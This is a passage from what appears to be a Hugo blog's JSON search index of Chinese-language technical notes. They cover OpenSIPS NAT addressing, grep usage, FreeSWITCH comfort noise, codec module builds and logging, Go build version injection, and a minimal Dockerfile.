这样的情况下,从内网发送到公网的请求,携带的Via就会被设置成1.2.3.4。\n但是也不是as设置的广告地址一定正确。这时候我们就可以用OpenSIPS提供的核心函数set_advertised_address或者set_advertised_port()来在脚本里自定义对外地址。\n例如:\nif (请求来自外网) { set_advertised_address(\u0026#34;192.168.2.11\u0026#34;); } else { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch9/nat-single-interface/","summary":" OPS \u0026lt;\u0026lt;\u0026lt;----------------------------- ingress 内网 | 公网 | | 192.168.2.11 | 1.2.3.4 INNER_IP | OUTER_IP | | ------------------------------\u0026gt;\u0026gt;\u0026gt; egress 常见公有云提供的云服务器,一般都有一个内网地址如192.168.2.11和一个公网地址如1.2.3.4。 内网地址是配置在网卡上的;公网地址则只是一个映射,并未在网卡上配置。\n我们称从公网到内网的方向为ingress,从内网到公网的方向为egress。\n对于内网来说OpenSIPS的广播地址应该是INNER_IP, 所以对ingress方向的SIP请求,Via应该是INNER_IP。对于公网来说OpenSIPS的广播地址应该是OUTER_IP, 所以对于egress方向的SIP请求,Via应该是OUTER_IP。\n我们模拟一下,假如设置了错误的Via的地址会怎样呢?\n例如从公网到内网的一个INVITE, 如果Via头加上的是OUTER_IP, 那么这个请求的响应也会被送到OPS的公网地址。但是由于网络策略和防火墙等原因,这个来自内网的响应很可能无法被送到OPS的公网地址。\n一般情况下,我们可以使用listen的as参数来设置对外的广告地址。\nlisten = udp:192.168.2.11:5060 as 1.2.3.4:5060 这样的情况下,从内网发送到公网的请求,携带的Via就会被设置成1.2.3.4。\n但是也不是as设置的广告地址一定正确。这时候我们就可以用OpenSIPS提供的核心函数set_advertised_address或者set_advertised_port()来在脚本里自定义对外地址。\n例如:\nif (请求来自外网) { set_advertised_address(\u0026#34;192.168.2.11\u0026#34;); } else { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ","title":"NAT场景下的信令处理 - 单网卡"},{"content":"1. grep 常用参数 参考: GNU Grep 3.0\n--color:高亮显示匹配到的字符串 -v:显示不能被pattern匹配到的 -i:忽略字符大小写 -o:仅显示匹配到的字符串 -q:静默模式,不输出任何信息 -A#:after,匹配到的后#行 -B#:before,匹配到的前#行 -C#:context,匹配到的前后各#行 -E:使用ERE,支持使用扩展的正则表达式 -c:只输出匹配行的计数。 -I:不区分大小写(只适用于单字符)。 -h:查询多文件时不显示文件名。 -l:查询多文件时只输出包含匹配字符的文件名。 -n:显示匹配行及行号。 -m:匹配多少个关键词之后就停止搜索 -s:不显示不存在或无匹配文本的错误信息。 -v:显示不包含匹配文本的所有行。 2. 普通:搜索trace.log 中含有ERROR字段的日志 grep ERROR trace.log 3. 输出文件:可以将日志输出到文件中 grep ERROR trace.log \u0026gt; error.log 4. 反向:搜索不包含ERROR字段的日志 grep -v ERROR trace.log 5. 向前:搜索包含ERROR,并且显示ERROR前10行的日志 grep -B 10 ERROR trace.log 6. 向后:搜索包含ERROR字段,并且显示ERROR后10行的日志 grep -A 10 ERROR trace.log 7. 
上下文:搜索包含ERROR字段,并且显示ERROR字段前后10行的日志 grep -C 10 ERROR trace.log 8. 多字段:搜索包含ERROR和DEBUG字段的日志 grep -E \u0026#39;ERROR|DEBUG\u0026#39; trace.log 9. 多文件:从多个.log文件中搜索含有ERROR的日志 grep ERROR *.log 10. 省略文件名:从多个.log文件中搜索ERROR字段日志,并不显示日志文件名 从多个文件中搜索的日志默认每行会带有日志文件名\ngrep -h ERROR *.log 11. 时间范围: 按照时间范围搜索日志 awk \u0026#39;$2\u0026gt;\u0026#34;17:30:00\u0026#34; \u0026amp;\u0026amp; $2\u0026lt;\u0026#34;18:00:00\u0026#34;\u0026#39; trace.log 日志形式如下, $2代表第二列即11:44:58, awk需要指定列\n11-21 16:44:58 /user/info/\n12. 有没有:搜索到第一个匹配行后就停止搜索 grep -m 1 ERROR trace.log 13. 使用正则提取字符串 grep -Eo \u0026#39;cause\u0026#34;:\u0026#34;(.*?)\u0026#34;\u0026#39; test.log cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;B\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; 如果想对提取出的字符串结果按照出现的次数进行排序,可以使用sort, uniq命令 grep -Eo \u0026lsquo;cause\u0026quot;:\u0026quot;(.*?)\u0026quot;\u0026rsquo; test.log | sort | uniq -c | sort -k1,1 -n\n步骤分解\nsort 对结果进行排序 uniq -c 对结果进行去重并统计出现次数 sort -k1,1 -n 按照第一列的结果,进行数值大小排序 ","permalink":"https://wdd.js.org/shell/grep-docs/","summary":"1. grep 常用参数 参考: GNU Grep 3.0\n--color:高亮显示匹配到的字符串 -v:显示不能被pattern匹配到的 -i:忽略字符大小写 -o:仅显示匹配到的字符串 -q:静默模式,不输出任何信息 -A#:after,匹配到的后#行 -B#:before,匹配到的前#行 -C#:context,匹配到的前后各#行 -E:使用ERE,支持使用扩展的正则表达式 -c:只输出匹配行的计数。 -I:不区分大小写(只适用于单字符)。 -h:查询多文件时不显示文件名。 -l:查询多文件时只输出包含匹配字符的文件名。 -n:显示匹配行及行号。 -m:匹配多少个关键词之后就停止搜索 -s:不显示不存在或无匹配文本的错误信息。 -v:显示不包含匹配文本的所有行。 2. 普通:搜索trace.log 中含有ERROR字段的日志 grep ERROR trace.log 3. 输出文件:可以将日志输出到文件中 grep ERROR trace.log \u0026gt; error.log 4. 反向:搜索不包含ERROR字段的日志 grep -v ERROR trace.log 5. 向前:搜索包含ERROR,并且显示ERROR前10行的日志 grep -B 10 ERROR trace.log 6. 向后:搜索包含ERROR字段,并且显示ERROR后10行的日志 grep -A 10 ERROR trace.log 7. 上下文:搜索包含ERROR字段,并且显示ERROR字段前后10行的日志 grep -C 10 ERROR trace.log 8. 
多字段:搜索包含ERROR和DEBUG字段的日志 gerp -E \u0026#39;ERROR|DEBUG\u0026#39; trace.","title":"grep常用参考"},{"content":"shell 自动化测试 https://github.com/bats-core/bats-core shell精进 https://github.com/NARKOZ/hacker-scripts https://github.com/trimstray/the-book-of-secret-knowledge https://legacy.gitbook.com/book/learnbyexample/command-line-text-processing https://github.com/dylanaraps/pure-bash-bible https://github.com/dylanaraps/pure-sh-bible https://github.com/Idnan/bash-guide https://github.com/denysdovhan/bash-handbook https://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html https://github.com/jlevy/the-art-of-command-line https://google.github.io/styleguide/shell.xml https://wiki.bash-hackers.org/start https://linuxguideandhints.com/ 安全加固 https://www.lisenet.com/2017/centos-7-server-hardening-guide/ https://highon.coffee/blog/security-harden-centos-7/ https://github.com/trimstray/the-practical-linux-hardening-guide https://github.com/decalage2/awesome-security-hardening https://www.hackingarticles.in/ https://github.com/toniblyx/my-arsenal-of-aws-security-tools ","permalink":"https://wdd.js.org/shell/star-collect/","summary":"shell 自动化测试 https://github.com/bats-core/bats-core shell精进 https://github.com/NARKOZ/hacker-scripts https://github.com/trimstray/the-book-of-secret-knowledge https://legacy.gitbook.com/book/learnbyexample/command-line-text-processing https://github.com/dylanaraps/pure-bash-bible https://github.com/dylanaraps/pure-sh-bible https://github.com/Idnan/bash-guide https://github.com/denysdovhan/bash-handbook https://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html https://github.com/jlevy/the-art-of-command-line https://google.github.io/styleguide/shell.xml https://wiki.bash-hackers.org/start https://linuxguideandhints.com/ 安全加固 https://www.lisenet.com/2017/centos-7-server-hardening-guide/ https://highon.coffee/blog/security-harden-centos-7/ https://github.com/trimstray/the-practical-linux-hardening-guide 
https://github.com/decalage2/awesome-security-hardening https://www.hackingarticles.in/ https://github.com/toniblyx/my-arsenal-of-aws-security-tools ","title":"Shell 书籍和资料收藏"},{"content":"人声检测 VAD 人声检测(VAD: Voice Activity Detection)是区分语音中是人说话的声音,还是其他例如环境音的一种功能。\n除此以外,人声检测还能用于减少网络中语音包传输的数据量,从而极大的降低语音的带宽,极限情况下能降低50%的带宽。\n在一个通话中,一般都是只有一个人说话,另一人听。很少可能是两个人都说话的。\n例如A在说话的时候,B可能在等待。\n虽然B在等待过程中,B的语音流依然再按照原始速度和编码再发给A, 即使这里面是环境噪音或者是无声。\nA ----\u0026gt; B # A在说话 A \u0026lt;--- B # B在等待过程中,B的语音流依然再按照原始速度和编码再发给A 如果B具有VAD检测功能,那么B就可以在不说话的时候,发送特殊标记的语音流或者通过减少语音流发送的频率,来减少无意义语音的发送。\n从而极大的降低B-\u0026gt;A的语音流。\n下图是Wireshark抓包的两种RTP包,g711编码的占214字节,但是用舒适噪音编码的只有63字节。将近减少了4倍的带宽。\n舒适噪音生成器 CNG 舒适噪音(CN stands for Comfort Noise), 是一种模拟的背景环境音。舒适噪音生成器在接收端根据发送到给的参数,来产生类似接收端的舒适噪音, 用来模拟发送方的噪音环境。\nCN也是一种RTP包的格式,定义在RFC 3389\n舒适噪音的payload, 也被称作静音插入描述帧(SID: a Silence Insertion Descriptor frame), 包括一个字节的数据,用来描述噪音的级别。也可以包含其他的额外的数据。早期版本的舒适噪音的格式定义在RFC 1890中,这个版本的格式只包含一个字段,就是噪音级别。\n噪音级别占用一个字节,其中第一个bit必须是0, 因此噪音级别有127中可能。\n0 1 2 3 4 5 6 7 +-+-+-+-+-+-+-+-+ |0| level | +-+-+-+-+-+-+-+-+ 跟着噪音级别的后续字节都是声音的频谱信息。\nByte 1 2 3 ... M+1 +-----+-----+-----+-----+-----+ |level| N1 | N2 | ... 
| NM | +-----+-----+-----+-----+-----+ Figure 2: CN Payload Packing Format 在SIP INVITE的SDP中也可以看到编码,如下面的CN\nm=audio 20000 RTP/AVP 8 111 63 103 104 9 0 106 105 13 110 112 113 126 a=rtpmap:106 CN/32000 a=rtpmap:105 CN/16000 a=rtpmap:13 CN/8000 当VAD函数检测到没有人声时,就会发送舒适噪音。通常来说,只有当环境噪音发生变化的时候,才需要发送CN包。接收方在收到新的CN包后,会更新产生舒适噪音的参数。\n比如下图是sngrep抓包关于webrtc的呼叫时,就能看到浏览器送到SIP Server的CN包。\n│ \u0026lt;────────────────────────────────────────────────── RTP (g711a) 130 ───────────────────── │ ──────────────────────────────────── RTP (g711a) 130 ─────────────────────────────────\u0026gt; │ │ ────────────────────────────────────────────────── RTP (g711a) 1168 ───────────────────── │ \u0026lt;\u0026lt;\u0026lt;──── 200 OK (SDP) ────── │ │ │ │ ────────────────────── 200 OK (SDP) ──────────────────\u0026gt;\u0026gt;\u0026gt; │ │ │ ──────────── ACK ─────────\u0026gt; │ │ │ │ \u0026lt;────────────────────────── ACK ───────────────────────── │ │ │ ──────────── ACK ─────────\u0026gt; │ │ │ │ \u0026lt;────────── INFO ────────── │ │ │ │ ────────────────────────── INFO ────────────────────────\u0026gt; │ │ │ \u0026lt;──────────────────────── 200 OK ──────────────────────── │ │ │ ────────── 200 OK ────────\u0026gt; │ │ │ │ \u0026lt;─────────────────────────────────────────────────── RTP (cn) 208 ─────────────────────── │ ───────────────────────────────────── RTP (cn) 208 ───────────────────────────────────\u0026gt; │ │ \u0026lt;────────────────────────── BYE ───────────────────────── │ │ FreeSWITCH WebRTC 录音质量差 FreeSWITCH bridge两个call leg, 一侧是WebRTC一侧是普通SIP终端,在录音的时候发现录音卡顿基本没办法听,但是双发通话的语音是正常的。\n最终发现录音质量差和舒适噪音有关。\n方案1: 全局抑制舒适噪音\n\u0026lt;!-- Video Settings --\u0026gt; \u0026lt;!-- Setting the max bandwdith --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_video_max_bandwidth_in=3mb\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_video_max_bandwidth_out=3mb\u0026#34;/\u0026gt; \u0026lt;!-- WebRTC Video --\u0026gt; \u0026lt;!-- 
Suppress CNG for WebRTC Audio --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;suppress_cng=true\u0026#34;/\u0026gt; \u0026lt;!-- Enable liberal DTMF for those that can\u0026#39;t get it right --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_liberal_dtmf=true\u0026#34;/\u0026gt; \u0026lt;!-- Helps with WebRTC Audio --\u0026gt; \u0026lt;!-- Stock Video Avatars --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;video_mute_png=$${images_dir}/default-mute.png\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;video_no_avatar_png=$${images_dir}/default-avatar.png\u0026#34;/\u0026gt; 方案2: 在Bleg抑制舒适噪音\n\u0026lt;action application=\u0026#34;set\u0026#34; data=\u0026#34;bridge_generate_comfort_noise=true\u0026#34;/\u0026gt; \u0026lt;action application=\u0026#34;bridge\u0026#34; data=\u0026#34;sofia/user/1000\u0026#34;/\u0026gt; 参考 https://freeswitch.org/confluence/display/FREESWITCH/VAD+and+CNG https://www.rfc-editor.org/rfc/rfc3389 https://www.rfc-editor.org/rfc/rfc1890 https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files#SofiaConfigurationFiles-suppress-cng https://freeswitch.org/confluence/display/FREESWITCH/bridge_generate_comfort_noise ","permalink":"https://wdd.js.org/freeswitch/webrtc-vad-cng/","summary":"人声检测 VAD 人声检测(VAD: Voice Activity Detection)是区分语音中是人说话的声音,还是其他例如环境音的一种功能。\n除此以外,人声检测还能用于减少网络中语音包传输的数据量,从而极大的降低语音的带宽,极限情况下能降低50%的带宽。\n在一个通话中,一般都是只有一个人说话,另一人听。很少可能是两个人都说话的。\n例如A在说话的时候,B可能在等待。\n虽然B在等待过程中,B的语音流依然再按照原始速度和编码再发给A, 即使这里面是环境噪音或者是无声。\nA ----\u0026gt; B # A在说话 A \u0026lt;--- B # B在等待过程中,B的语音流依然再按照原始速度和编码再发给A 如果B具有VAD检测功能,那么B就可以在不说话的时候,发送特殊标记的语音流或者通过减少语音流发送的频率,来减少无意义语音的发送。\n从而极大的降低B-\u0026gt;A的语音流。\n下图是Wireshark抓包的两种RTP包,g711编码的占214字节,但是用舒适噪音编码的只有63字节。将近减少了4倍的带宽。\n舒适噪音生成器 CNG 舒适噪音(CN stands for Comfort Noise), 是一种模拟的背景环境音。舒适噪音生成器在接收端根据发送到给的参数,来产生类似接收端的舒适噪音, 用来模拟发送方的噪音环境。\nCN也是一种RTP包的格式,定义在RFC 3389\n舒适噪音的payload, 
也被称作静音插入描述帧(SID: a Silence Insertion Descriptor frame), 包括一个字节的数据,用来描述噪音的级别。也可以包含其他的额外的数据。早期版本的舒适噪音的格式定义在RFC 1890中,这个版本的格式只包含一个字段,就是噪音级别。\n噪音级别占用一个字节,其中第一个bit必须是0, 因此噪音级别有127中可能。\n0 1 2 3 4 5 6 7 +-+-+-+-+-+-+-+-+ |0| level | +-+-+-+-+-+-+-+-+ 跟着噪音级别的后续字节都是声音的频谱信息。\nByte 1 2 3 ... M+1 +-----+-----+-----+-----+-----+ |level| N1 | N2 | .","title":"WebRTC 人声检测与舒适噪音"},{"content":"暴露的变量必须用var定义,不能用const定义\n// main.go var VERSION = \u0026#34;unknow\u0026#34; var SHA = \u0026#34;unknow\u0026#34; var BUILD_TIME = \u0026#34;unknow\u0026#34; ... func main () { app := \u0026amp;cli.App{ Version: VERSION + \u0026#34;\\r\\nsha: \u0026#34; + SHA + \u0026#34;\\r\\nbuild time: \u0026#34; + BUILD_TIME, ... } Makefile\ntag?=v0.0.5 DATE?=$(shell date +%FT%T%z) VERSION_HASH = $(shell git rev-parse HEAD) LDFLAGS=\u0026#39;-X \u0026#34;main.VERSION=$(tag)\u0026#34; -X \u0026#34;main.SHA=$(VERSION_HASH)\u0026#34; -X \u0026#34;main.BUILD_TIME=$(DATE)\u0026#34;\u0026#39; build: CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags $(LDFLAGS) -o wellcli main.go 执行make build, 产生的二进制文件,就含有注入的信息了。\n-ldflags \u0026#39;[pattern=]arg list\u0026#39; arguments to pass on each go tool link invocation. https://golang.google.cn/cmd/go/#hdr-Build_modes https://www.digitalocean.com/community/tutorials/using-ldflags-to-set-version-information-for-go-applications ","permalink":"https://wdd.js.org/golang/inject-version/","summary":"暴露的变量必须用var定义,不能用const定义\n// main.go var VERSION = \u0026#34;unknow\u0026#34; var SHA = \u0026#34;unknow\u0026#34; var BUILD_TIME = \u0026#34;unknow\u0026#34; ... func main () { app := \u0026amp;cli.App{ Version: VERSION + \u0026#34;\\r\\nsha: \u0026#34; + SHA + \u0026#34;\\r\\nbuild time: \u0026#34; + BUILD_TIME, ... 
} Makefile\ntag?=v0.0.5 DATE?=$(shell date +%FT%T%z) VERSION_HASH = $(shell git rev-parse HEAD) LDFLAGS=\u0026#39;-X \u0026#34;main.VERSION=$(tag)\u0026#34; -X \u0026#34;main.SHA=$(VERSION_HASH)\u0026#34; -X \u0026#34;main.BUILD_TIME=$(DATE)\u0026#34;\u0026#39; build: CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags $(LDFLAGS) -o wellcli main.go 执行make build, 产生的二进制文件,就含有注入的信息了。\n-ldflags \u0026#39;[pattern=]arg list\u0026#39; arguments to pass on each go tool link invocation.","title":"在二进制文件中注入版本信息"},{"content":"FROM golang:1.16.2 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build . FROM scratch WORKDIR /app COPY --from=builder /app/your_app . # 配置时区 COPY --from=builder /usr/share/zoneinfo /usr/share/zoneinfo ENV TZ=Asia/Shanghai EXPOSE 8080 ENTRYPOINT [\u0026#34;./your_app\u0026#34;] ","permalink":"https://wdd.js.org/golang/scratch-dockerfile/","summary":"FROM golang:1.16.2 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build . FROM scratch WORKDIR /app COPY --from=builder /app/your_app . 
# 配置时区 COPY --from=builder /usr/share/zoneinfo /usr/share/zoneinfo ENV TZ=Asia/Shanghai EXPOSE 8080 ENTRYPOINT [\u0026#34;./your_app\u0026#34;] ","title":"Golang Dockerfile"},{"content":"如何在markdown中插入图片 在static 目录中创建 images 目录,然后把图片放到images目录中。\n在文章中引用的时候\n![](/images/qianxun.jpeg#center) Warning 我之前创建的文件夹的名字叫做 img, 本地可以正常显示,但是部署之后,就无法显示图片了。\n最后我把img改成images才能正常在网页上显示。\n","permalink":"https://wdd.js.org/posts/2022/05/hugo-blog-faq/","summary":"如何在markdown中插入图片 在static 目录中创建 images 目录,然后把图片放到images目录中。\n在文章中引用的时候\n![](/images/qianxun.jpeg#center) Warning 我之前创建的文件夹的名字叫做 img, 本地可以正常显示,但是部署之后,就无法显示图片了。\n最后我把img改成images才能正常在网页上显示。","title":"Hugo博客常见问题以及解决方案"},{"content":"g729编码的占用带宽是g711的1/8,使用g729编码,可以极大的降低带宽的费用。fs原生的mod_g729模块是需要按并发数收费的,但是我们可以使用开源的bcg729模块。\n这里需要准备两个仓库,为了加快clone速度,我将这两个模块导入到gitee上。\nhttps://gitee.com/wangduanduan/mod_bcg729 https://gitee.com/wangduanduan/bcg729 安装前提 已经安装好了freeswitch, 编译mod_bcg729模块,需要指定freeswitch头文件的位置\nstep0: 切换到工作目录 cd /usr/local/src/ step1: clone mod_bcg729 git clone https://gitee.com/wangduanduan/mod_bcg729.git step2: clone bcg729 mod_bcg729模块在编译的时候,会检查当前目录下有没有bcg729的目录。 如果没有这个目录,就会从github上clone bcg729的项目。 所以我们可以在编译之前,先把bcg729 clone到mod_bcg729目录下\ncd mod_bcg729 git clone https://gitee.com/wangduanduan/bcg729.git step3: 编译mod_bcg729 编译mod_bcg729需要指定fs头文件switch.h的位置。 在Makefile项目里有FS_INCLUDES这个变量用来定义fs头文件的位置\nFS_INCLUDES=/usr/include/freeswitch FS_MODULES=/usr/lib/freeswitch/mod 如果你的源码头文件路径不是/usr/include/freeswitch, 则需要在执行make命令时通过参数指定, 例如下面编译的时候。\nmake FS_INCLUDES=/usr/local/freeswitch/include/freeswitch Tip 如何找到头文件的目录? 
头文件一般在fs安装目录的include/freeswitch目录下 如果还是找不到,则可以使用 find /usr -name switch.h -type f 搜索对应的头文件 step4: 复制so文件 mod_bcg729编译之后,可以把生成的mod_bcg729.so拷贝到fs安装目录的mod目录下\nstep5: 加载模块 命令行加载\nload mod_bcg729 配置文件加载 命令行加载重启后就失效了,可以将加载的模块写入到配置文件中。 在modules.conf.xml中加入\n\u0026lt;load module=\u0026#34;mod_bcg729\u0026#34;/\u0026gt; step5: vars.xml修改 \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;global_codec_prefs=PCMU,PCMA,G729\u0026#34; /\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;outbound_codec_prefs=PCMU,PCMA,G729\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;media_mix_inbound_outbound_codecs=true\u0026#34;/\u0026gt; step6: sip profile修改 开启转码\n\u0026lt;param name=\u0026#34;disable-transcoding\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt; 然后重启fs, 进入到fs_cli中,输入: show codec, 看看有没有显示729编码。然后就是找话机,测试g729编码了。\n","permalink":"https://wdd.js.org/freeswitch/install-bcg729/","summary":"g729编码的占用带宽是g711的1/8,使用g729编码,可以极大的降低带宽的费用。fs原生的mod_g729模块是需要按并发数收费的,但是我们可以使用开源的bcg729模块。\n这里需要准备两个仓库,为了加快clone速度,我将这两个模块导入到gitee上。\nhttps://gitee.com/wangduanduan/mod_bcg729 https://gitee.com/wangduanduan/bcg729 安装前提 已经安装好了freeswitch, 编译mod_bcg729模块,需要指定freeswitch头文件的位置\nstep0: 切换到工作目录 cd /usr/local/src/ step1: clone mod_bcg729 git clone https://gitee.com/wangduanduan/mod_bcg729.git step2: clone bcg729 mod_bcg729模块在编译的时候,会检查当前目录下有没有bcg729的目录。 如果没有这个目录,就会从github上clone bcg729的项目。 所以我们可以在编译之前,先把bcg729 clone到mod_bcg729目录下\ncd mod_bcg729 git clone https://gitee.com/wangduanduan/bcg729.git step3: 编译mod_bcg729 编译mod_bcg729需要指定fs头文件switch.h的位置。 在Makefile项目里有FS_INCLUDES这个变量用来定义fs头文件的位置\nFS_INCLUDES=/usr/include/freeswitch FS_MODULES=/usr/lib/freeswitch/mod 如果你的源码头文件路径不是/usr/include/freeswitch, 则需要在执行make命令时通过参数指定, 例如下面编译的时候。\nmake FS_INCLUDES=/usr/local/freeswitch/include/freeswitch Tip 如何找到头文件的目录? 
头文件一般在fs安装目录的include/freeswitch目录下 如果还是找不到,则可以使用 find /usr -name switch.h -type f 搜索对应的头文件 step4: 复制so文件 mod_bcg729编译之后,可以把生成的mod_bcg729.so拷贝到fs安装目录的mod目录下\nstep5: 加载模块 命令行加载\nload mod_bcg729 配置文件加载 命令行加载重启后就失效了,可以将加载的模块写入到配置文件中。 在modules.conf.xml中加入\n\u0026lt;load module=\u0026#34;mod_bcg729\u0026#34;/\u0026gt; step5: vars.xml修改 \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;global_codec_prefs=PCMU,PCMA,G729\u0026#34; /\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;outbound_codec_prefs=PCMU,PCMA,G729\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESScmd=\u0026#34;set\u0026#34;data=\u0026#34;media_mix_inbound_outbound_codecs=true\u0026#34;/\u0026gt; step6: sip profile修改 开启转码","title":"安装bcg729模块"},{"content":"呼入到会议,正常来说,当会议室有且只有一人时,应该会报“当前只有一人的提示音”。但是测试的时候,输入了密码,进入了会议,却没有播报正常的提示音。\n经过排查发现,dialplan中,会议室的名字中含有@符号。\n按照fs的文档,发现@后面应该是profilename, 然而fs的conference.conf.xml却没有这个profile, 进而导致语音无法播报的问题。所以只要加入这个profile, 或者直接用@default, 就可以正确的播报语音了。\nAction data Description confname profile is \u0026ldquo;default\u0026rdquo;, no flags or pin confname+1234 profile is \u0026ldquo;default\u0026rdquo;, pin is 1234 confname@profilename+1234 profile is \u0026ldquo;profilename\u0026rdquo;, pin=1234, no flags confname+1234+flags{mute} profile is \u0026ldquo;default\u0026rdquo;, pin=1234, one flag confname++flags{endconf|moderator} profile is \u0026ldquo;default\u0026rdquo;, no p.i.n., multiple flags bridge:confname:1000@${domain_name} a \u0026ldquo;bridging\u0026rdquo; conference, you must provide another endpoint, or \u0026rsquo;none'. 
bridge:uuid:none a \u0026ldquo;bridging\u0026rdquo; conference with UUID assigned as conference name 所以,当你遇到问题的时候,应该仔细的再去阅读一下官方的接口文档。\n参考文档\nhttps://txlab.wordpress.com/2012/09/17/setting-up-a-conference-bridge-with-freeswitch/ https://freeswitch.org/confluence/display/FREESWITCH/mod_conference ","permalink":"https://wdd.js.org/freeswitch/conference-announce/","summary":"呼入到会议,正常来说,当会议室有且只有一人时,应该会报“当前只有一人的提示音”。但是测试的时候,输入了密码,进入了会议,却没有播报正常的提示音。\n经过排查发现,dialplan中,会议室的名字中含有@符号。\n按照fs的文档,发现@后面应该是profilename, 然而fs的conference.conf.xml却没有这个profile, 进而导致语音无法播报的问题。所以只要加入这个profile, 或者直接用@default, 就可以正确的播报语音了。\nAction data Description confname profile is \u0026ldquo;default\u0026rdquo;, no flags or pin confname+1234 profile is \u0026ldquo;default\u0026rdquo;, pin is 1234 confname@profilename+1234 profile is \u0026ldquo;profilename\u0026rdquo;, pin=1234, no flags confname+1234+flags{mute} profile is \u0026ldquo;default\u0026rdquo;, pin=1234, one flag confname++flags{endconf|moderator} profile is \u0026ldquo;default\u0026rdquo;, no p.i.n., multiple flags bridge:confname:1000@${domain_name} a \u0026ldquo;bridging\u0026rdquo; conference, you must provide another endpoint, or \u0026rsquo;none'. 
bridge:uuid:none a \u0026ldquo;bridging\u0026rdquo; conference with UUID assigned as conference name 所以,当你遇到问题的时候,应该仔细的再去阅读一下官方的接口文档。\n参考文档","title":"会议提示音无法正常播放"},{"content":"开启sip信令的日志 这样会让fs把收发的sip信令打印到fs_cli里面,但不是日志文件里面\nsofia global siptrace on # sofia global siptrace off 关闭 开启sofia模块的日志 sofia 模块的日志即使开启,也是输出到fs_cli里面的,不会输出到日志文件里面\nsofia loglevel all 7 # sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] 将fs_cli的输出,写到日志文件里 sofia tracelevel 会将某些日志重定向到日志文件里 sofia tracelevel debug # sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; 注意,debug级别的日志非常多,仅仅适用于debug\n大量的日志写入磁盘\n占用太多的io 磁盘空间可能很快占满 ","permalink":"https://wdd.js.org/freeswitch/log-settings/","summary":"开启sip信令的日志 这样会让fs把收发的sip信令打印到fs_cli里面,但不是日志文件里面\nsofia global siptrace on # sofia global siptrace off 关闭 开启sofia模块的日志 sofia 模块的日志即使开启,也是输出到fs_cli里面的,不会输出到日志文件里面\nsofia loglevel all 7 # sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] 将fs_cli的输出,写到日志文件里 sofia tracelevel 会将某些日志重定向到日志文件里 sofia tracelevel debug # sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; 注意,debug级别的日志非常多,仅仅适用于debug\n大量的日志写入磁盘\n占用太多的io 磁盘空间可能很快占满 ","title":"FS日志设置"},{"content":"About Sofia is a FreeSWITCH™ module (mod_sofia) that provides SIP connectivity to and from FreeSWITCH in the form of a User Agent. A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for handling a certain network protocol; the network protocol in Sofia\u0026rsquo;s case is SIP. Sofia is the general name of any User Agent in FreeSWITCH using the SIP network protocol. For example, Sofia receives calls sent to FreeSWITCH from other SIP User Agents (UAs), sends calls to other UAs, acts as a client to register FreeSWITCH with other UAs, lets clients register with FreeSWITCH, and connects calls (i.e., to local extensions). 
To add a SIP Provider (Sofia User Agent) to your FreeSWITCH, please see the Interoperability Examples and add the SIP Provider information in an .xml file stored under conf/sip_profiles/\nSofia allows for multiple User Agents A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for running a certain network protocol, and a Sofia UA is the same thing but the protocol in that case is SIP. When FreeSWITCH starts, it reads the conf/autoload_configs/sofia.conf.xml file. That file contains an \u0026ldquo;X-PRE-PROCESS\u0026rdquo; directive which instructs FreeSWITCH to subsequently load and merge any conf/sip_profiles/*.xml files. Each *.xml file so loaded and merged should contain a complete description of one or more SIP Profiles. Each SIP Profile so loaded is part of a \u0026ldquo;User Agent\u0026rdquo; or \u0026ldquo;UA\u0026rdquo;; in FreeSWITCH terms, UA = User Agent = Sofia Profile = SIP Profile. Note that the individual UAs so loaded are all merged together by FreeSWITCH and must not interfere with each other: In particular, each UA must have its own unique port on which it accepts connections (the default port for SIP is 5060).\nMultiple User Agents (Profiles) and the Dialplan Why might you want to create multiple User Agents? Here\u0026rsquo;s an example. In my office, I use a firewall. This means that calls I make to locations outside the firewall must use a STUN server to traverse the NAT in the firewall, while calls within the office 